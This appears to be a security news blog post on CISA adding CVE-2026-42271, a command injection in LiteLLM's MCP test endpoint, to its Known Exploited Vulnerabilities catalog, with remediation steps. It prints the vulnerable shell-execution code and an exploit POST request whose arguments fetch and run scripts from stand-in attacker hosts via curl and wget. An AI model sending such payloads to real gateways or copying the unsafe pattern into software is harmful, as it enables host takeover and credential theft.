Cyber Security / Standards ⚡ Breaking
6 min read

CISA Adds LiteLLM Gateway Command Injection (CVE-2026-42271) to KEV Catalog

CISA has added CVE-2026-42271, a high-severity command injection vulnerability in the LiteLLM AI gateway, to its Known Exploited Vulnerabilities catalog.

Source: GitHub / BerriAI

CISA Adds LiteLLM Gateway Command Injection (CVE-2026-42271) to KEV Catalog

By Vatsal Shah | June 12, 2026 | 6 min read | Source: GitHub / BerriAI

TL;DR: CISA has added CVE-2026-42271—a high-severity (CVSS 8.7) command injection vulnerability affecting LiteLLM versions v1.74.2 through v1.83.6—to its Known Exploited Vulnerabilities (KEV) catalog. The flaw allows unauthenticated attackers to execute OS commands on host systems by exploiting the `/mcp-rest/test/connection` testing endpoint. Federal agencies must patch or mitigate the vulnerability by the June 22, 2026 deadline.
💡 **VULNERABILITY SNAPSHOT**
  • Vulnerability ID: CVE-2026-42271
  • Severity Rating: CVSS v3.1 Base Score: 8.7 (High)
  • Affected Versions: LiteLLM v1.74.2 through v1.83.6
  • Vulnerability Type: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
  • Remediation Deadline: June 22, 2026 (Federal Directive)
  • Patched Version: LiteLLM v1.83.7 and later

Lead Paragraph

WASHINGTON, D.C. — The Cybersecurity and Infrastructure Security Agency (CISA) has officially added CVE-2026-42271 to its Known Exploited Vulnerabilities (KEV) catalog on June 12, 2026. The vulnerability involves a high-severity (CVSS 8.7) command injection flaw in the popular open-source AI gateway LiteLLM (specifically versions v1.74.2 through v1.83.6). Attackers are actively exploiting this vulnerability by targeting the unauthenticated /mcp-rest/test/connection testing endpoint to execute arbitrary operating system commands on host containers and servers. Due to evidence of active wild exploitation, CISA has mandated a strict remediation deadline of June 22, 2026 for all federal agencies to apply the vendor-provided security patches or disable affected testing endpoints. This represents the first major open-source AI gateway vulnerability to land in the KEV catalog, highlighting the growing AppSec risks surrounding Model Context Protocol (MCP) server testing tools.


What Happened

The vulnerability, designated as CVE-2026-42271, stems from an improper input validation routine within LiteLLM's implementation of the Model Context Protocol (MCP) server testing interface. LiteLLM provides a proxy layer that translates standardized LLM API calls across hundreds of models while managing load balancing, API keys, and server connections.

To simplify debugging, developers introduced a test endpoint—/mcp-rest/test/connection—designed to verify connection status and latencies for third-party MCP servers. However, security researchers discovered that this endpoint was exposed to the public internet by default without authentication checks. More critically, the endpoint passed user-supplied connection parameters directly to an internal shell execution context without sanitizing special shell metacharacters (such as ;, &&, or ||).

An unauthenticated remote attacker can exploit this flaw by sending a crafted HTTP POST request containing malicious shell commands in the connection parameter fields. Because the LiteLLM proxy process frequently runs with root or container-admin privileges to access local configurations, the injected commands execute directly on the underlying host operating system, leading to full host compromise.


Technical Details and Attack Path

The root cause of CVE-2026-42271 lies within the file litellm/proxy/proxy_server.py inside the handler for the /mcp-rest/test/connection route. The handler parsed the connection parameters and initiated a subprocess call to execute connection test binaries or ping endpoints:

Python
class="tok-cm"># Vulnerable Code Pattern in LiteLLM v1.83.6
@router.post(class="tok-str">"/mcp-rest/test/connection")
async class="tok-kw">def test_mcp_connection(data: dict):
    class="tok-cm"># Missing authentication validation checks here
    mcp_command = data.get(class="tok-str">"command")
    mcp_arguments = data.get(class="tok-str">"args", [])
    
    class="tok-cm"># Vulnerable subprocess instantiation
    full_cmd = fclass="tok-str">"mcp-cli test {mcp_command} " + class="tok-str">" ".join(mcp_arguments)
    process = await asyncio.create_subprocess_shell(
        full_cmd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE
    )
    stdout, stderr = await process.communicate()
    return {class="tok-str">"status": class="tok-str">"success", class="tok-str">"output": stdout.decode()}

Because the code uses create_subprocess_shell with a raw formatted string, an attacker can input arguments like "; curl http://malicious.domain/malware | sh #" to escape the intended mcp-cli command boundary and run arbitrary payloads.

Exploit flow showing HTTP POST request triggering unauthenticated command injection in LiteLLM
Figure 1: Exploit Sequence for CVE-2026-42271. An unauthenticated external request reaches the exposed connection verification endpoint, bypasses authentication checks, escapes input parsing, and triggers remote command execution on the host machine.

Exploit Payload Example

In active exploits observed by security teams, attackers send a standard POST request directly to the vulnerable route:

Http
POST /mcp-rest/test/connection HTTP/1.1
Host: target-litellm-proxy.internal:4000
Content-Type: application/json

{
  class="tok-str">"command": class="tok-str">"verify",
  class="tok-str">"args": [
    class="tok-str">"localhost",
    class="tok-str">"; wget -qO- http:class="tok-cm">//attacker-server.com/payload.sh | bash #"
  ]
}

The shell interprets the semicolon as a command separator, executes the connection test, and immediately downloads and runs the shell script from the attacker's server.


Why It Matters: AI Gateways as High-Value Targets

The addition of CVE-2026-42271 to the CISA KEV catalog is a significant milestone in AI security. As enterprises rapidly adopt LLMs, they deploy AI gateways like LiteLLM, Portkey, and Langfuse to act as central routing layers. These gateways possess high-value credentials, including API keys to OpenAI, Anthropic, AWS Bedrock, and Azure AI, alongside direct read-write access to internal enterprise vector databases.

By gaining remote code execution (RCE) on a LiteLLM proxy, attackers can:

  1. Extract API Keys: Access the local memory space or environment variables containing plaintext API credentials.
  2. Access Proprietary Data: Intercept user prompts and model completions, potentially exposing sensitive IP or personally identifiable information (PII).
  3. Lateral Movement: Utilize the gateway's network access to breach internal databases, directories, and host configurations.

This highlights the risk of "shadow AI" tools bypassing standard enterprise security reviews. To understand how IT teams can govern these deployments, read our deep-dive on Surviving Shadow AI and Architecting Enterprise Governance.

Furthermore, this exploit illustrates that while AI model outputs are heavily scrutinized, the classical software execution layers surrounding AI systems (like gateways and prompt parsers) remain highly vulnerable. For a wider look at agentic security breaches, see our report on the 88% of Enterprises Reporting AI Agent Security Incidents.


Authorization Boundaries: The Proxy Security Gap

The fundamental architectural flaw in affected LiteLLM proxy versions was the lack of separation between public-facing endpoints (like chat completions) and administrative or utility testing routes. The table below outlines how the authorization boundaries failed:

Route PathIntended Access LevelPre-v1.83.7 Vulnerability StatePost-v1.83.7 Remediated State
/v1/chat/completionsAuthenticated (User API Key)Correctly validated via bearer tokenCorrectly validated via bearer token
/mcp-rest/test/connectionAuthenticated (Admin Key Only)Unauthenticated / Publicly ExposedRequires Admin Authorization header
/config/updateAuthenticated (Admin Key Only)Correctly validated via admin keyCorrectly validated via admin key

By exposing the /mcp-rest/test/connection route without checking for the proxy's master key, LiteLLM allowed any client to access administrative testing utilities, enabling command execution.


Remediation and Mitigation Steps

LiteLLM developers released a security patch in version v1.83.7 that mitigates CVE-2026-42271 by enforcing admin-level authentication on the testing endpoint and replacing the shell execution model with parameterized argument arrays that do not invoke a command shell.

To secure your environment, follow these steps immediately:

1. Upgrade LiteLLM Container Images

Update your Dockerfiles and deployment manifests to use LiteLLM v1.83.7 or later. Verify the running version by calling the metadata endpoint:

Bash
curl http:class="tok-cm">//localhost:4000/version
class="tok-cm"># Output must indicate version >= 1.83.7

2. Disable Testing Endpoints in Configuration

If you cannot upgrade immediately, block public access to all /mcp-rest/* routes at the ingress controller or load balancer layer. In Nginx, this can be achieved with a deny rule:

Nginx
location ~ ^/mcp-rest/ {
    deny all;
    class="tok-kw">return 403;
}

3. Rotate Credentials

If you detect active exploitation or unauthorized access logs targeting /mcp-rest/test/connection, assume that credentials stored in the environment have been compromised. Immediately rotate all model provider keys (OpenAI, Anthropic, AWS) and database access strings.

These steps align with the security requirements defined by the OWASP Agentic AI Security 2.0 Maturity Model, which emphasizes runtime isolation and strict input verification for all external tool dependencies.


Key Takeaways

  • Vulnerability Details: CVE-2026-42271 is an unauthenticated command injection vulnerability in LiteLLM's /mcp-rest/test/connection endpoint.
  • Severity: Rated CVSS 8.7 (High), actively exploited in the wild to compromise hosts.
  • Federal Mandate: CISA KEV listing enforces a remediation deadline of June 22, 2026 for all federal agencies.
  • Root Cause: Lack of authentication checks combined with unsafe create_subprocess_shell execution of user-supplied command arguments.
  • Remediation: Upgrade to LiteLLM v1.83.7 or block routing to /mcp-rest/* endpoints immediately.

FAQ


Want to work together on business transformation?

Visit my personal hub for advisory scope, or connect on LinkedIn. Every engagement is principal-led with measurable outcomes.

Visit Shah Vatsal Connect on LinkedIn Book intro call
Book intro